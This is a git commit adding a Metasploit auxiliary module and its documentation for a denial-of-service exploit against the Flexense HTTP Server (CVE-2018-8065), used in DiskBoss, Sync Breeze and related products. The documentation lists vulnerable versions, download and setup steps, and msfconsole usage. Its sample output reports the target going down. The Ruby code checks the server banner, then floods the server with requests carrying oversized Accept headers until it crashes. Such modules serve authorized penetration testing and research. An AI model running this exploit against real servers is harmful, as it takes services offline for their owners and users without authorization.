Land #9701, Flexense HTTP Server DoS exploit
parent
9e9e129716
commit
c8ff6cb5a4
|
@ -0,0 +1,67 @@
|
|||
## Description
|
||||
This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
|
||||
a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
|
||||
Following list of softwares are vulnerable to Denial Of Service.
|
||||
read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
|
||||
|
||||
|
||||
DiskBoss Enterprise <= v9.0.18
|
||||
Sync Breeze Enterprise <= v10.6.24
|
||||
Disk Pulse Enterprise <= v10.6.24
|
||||
Disk Savvy Enterprise <= v10.6.24
|
||||
Dup Scout Enterprise <= v10.6.24
|
||||
VX Search Enterprise <= v10.6.24
|
||||
|
||||
|
||||
**Vulnerable Application Link**
|
||||
http://www.diskboss.com/downloads.html
|
||||
http://www.syncbreeze.com/downloads.html
|
||||
http://www.diskpulse.com/downloads.html
|
||||
http://www.disksavvy.com/downloads.html
|
||||
http://www.dupscout.com/downloads.html
|
||||
|
||||
|
||||
## Vulnerable Application Installation Setup.
|
||||
All Flexense applications that are listed above can be installed by following these steps.
|
||||
|
||||
Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```
|
||||
|
||||
**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard**
|
||||
|
||||
After the installation navigate to: ```Options->Server```
|
||||
|
||||
Check the box saying: ```Enable web server on port:...```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/dos/http/flexense_http_server_dos`
|
||||
4. Do: `set rport <port>`
|
||||
5. Do: `set rhost <ip>`
|
||||
6. Do: `check`
|
||||
```
|
||||
[+] 192.168.1.20:80 The target is vulnerable.
|
||||
```
|
||||
7. Do: `run`
|
||||
8. Web server will crash after 200-1000 request depending on the OS version and system memory.
|
||||
|
||||
## Scenarios
|
||||
**TESTED AGAINST WINDOWS 7/10**
|
||||
```
|
||||
msf5 > use auxiliary/dos/http/flexense_http_server_dos
|
||||
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
|
||||
rhost => 192.168.1.27
|
||||
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80
|
||||
rport => 80
|
||||
msf5 auxiliary(dos/http/flexense_http_server_dos) > run
|
||||
|
||||
[*] 192.168.1.20:80 - Triggering the vulnerability
|
||||
[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
|
@ -0,0 +1,91 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Flexense HTTP Server Denial Of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
|
||||
Vulnerability caused by a user mode write access memory violation and can be triggered with
|
||||
rapidly sending variety of HTTP requests with long HTTP header values.
|
||||
|
||||
Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
|
||||
},
|
||||
'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2018-8065'],
|
||||
[ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2018'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
|
||||
OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
connect
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
res = sock.get
|
||||
if res and res.include? 'Flexense HTTP Server v10.6.24'
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
rescue Rex::ConnectionRefused
|
||||
print_error("Target refused the connection")
|
||||
Exploit::CheckCode::Unknown
|
||||
rescue
|
||||
print_error("Target did not respond to HTTP request")
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
|
||||
end
|
||||
|
||||
size = datastore['PacketSize'].to_i
|
||||
print_status("Starting with packets of #{size}-byte strings")
|
||||
|
||||
count = 0
|
||||
loop do
|
||||
payload = ""
|
||||
payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
|
||||
payload << "Host: 127.0.0.1\r\n"
|
||||
payload << "Accept: "+('A' * size)+"\r\n"
|
||||
payload << "\r\n\r\n"
|
||||
begin
|
||||
connect
|
||||
sock.put(payload)
|
||||
disconnect
|
||||
count += 1
|
||||
break if count==datastore['PacketCount']
|
||||
rescue ::Rex::InvalidDestination
|
||||
print_error('Invalid destination! Continuing...')
|
||||
rescue ::Rex::ConnectionTimeout
|
||||
print_error('Connection timeout! Continuing...')
|
||||
rescue ::Errno::ECONNRESET
|
||||
print_error('Connection reset! Continuing...')
|
||||
rescue ::Rex::ConnectionRefused
|
||||
print_good("DoS successful after #{count} packets with #{size}-byte headers")
|
||||
return true
|
||||
end
|
||||
end
|
||||
print_error("DoS failed after #{count} packets of #{size}-byte strings")
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue